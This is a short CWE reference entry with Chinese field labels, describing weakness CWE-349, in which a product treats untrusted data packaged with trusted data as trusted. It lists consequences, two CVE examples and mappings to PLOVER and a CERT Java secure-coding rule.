CWE-349: Acceptance of Extraneous Untrusted Data With Trusted Data
CWE版本: 4.18
更新日期: 2025-09-09
弱点描述
The product, when processing trusted data, accepts any untrusted data that is also included with the trusted data, treating the untrusted data as if it were trusted.
常见后果
影响范围: Access Control Integrity
技术影响: Bypass Protection Mechanism Modify Application Data
说明: An attacker could package untrusted data with trusted data to bypass protection mechanisms to gain access to and possibly modify sensitive data.
观察示例
参考: CVE-2002-0018
Does not verify that trusted entity is authoritative for all entities in its response.
参考: CVE-2006-5462
use of extra data in a signature allows certificate signature forging
引入模式
| 阶段 | 说明 |
|---|---|
| Implementation | - |
适用平台
编程语言
分类映射
| 分类名称 | 条目ID | 条目名称 | 映射适配度 |
|---|---|---|---|
| PLOVER | - | Untrusted Data Appended with Trusted Data | - |
| The CERT Oracle Secure Coding Standard for Java (2011) | ENV01-J | Place all security-sensitive code in a single JAR and sign and seal it | - |